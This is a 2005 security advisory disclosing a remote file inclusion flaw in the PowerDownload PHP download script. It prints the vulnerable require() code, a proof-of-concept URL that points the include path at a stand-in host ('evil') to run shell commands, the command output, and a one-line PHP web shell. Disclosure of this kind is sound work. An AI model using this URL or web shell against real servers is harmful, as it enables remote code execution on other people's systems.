PowerDownloadExec.txt

`===========================================================  
  
============================================================  
Title: PowerDownload Remote File Inclusion.  
Vulnerability discovery: SoulBlack - Security Research -  
http://soulblack.com.ar  
Date: 31/05/2005  
Severity: High. Remote Users Can Execute Arbitrary Code.  
Affected version: v3.0.2 & v3.0.3  
vendor: http://www.powerscripts.org/  
============================================================  
  
============================================================  
  
* Summary *  
  
PowerDownload is a PHP and mySQL based Download Script.  
  
-------------------------------------------------------------  
  
* Problem Description *  
  
The bug reside in $incdir var in pdl-inc/pdl_header.inc.php  
  
Vulnerable Code  
  
// Include required Files  
if(!isset($incdir)) $incdir = "";  
require($incdir."pdl-inc/pdl_config.inc.php");  
require($incdir."pdl-inc/pdl_db_class_".strtolower($config_sql_type).".inc.php");  
require($incdir."pdl-inc/pdl_functions.inc.php");  
  
  
/*  
  
http://server/download/downloads.php?release_id=650&incdir=http://evil/cmd.gif?&cmd=uname%20-a  
  
Linux webserver101 2.4.21-243-athlon #1 Thu Aug 12 15:24:15 UTC 2004 i686 athlon  
  
*/  
  
/*  
-------  
cmd.gif  
-------  
  
<?  
system($cmd);  
?>  
  
*/  
  
-------------------------------------------------------------  
  
  
-------------------------------------------------------------  
  
* Fix *  
  
Contact the Vendor.  
  
-------------------------------------------------------------  
  
* References *  
  
http://www.soulblack.com.ar/repo/papers/advisory/powerdownload_advisory.txt  
  
-------------------------------------------------------------  
  
* Credits *  
  
Vulnerability reported by SoulBlack Security Research  
  
============================================================  
  
--  
SoulBlack - Security Research  
http://www.soulblack.com.ar  
`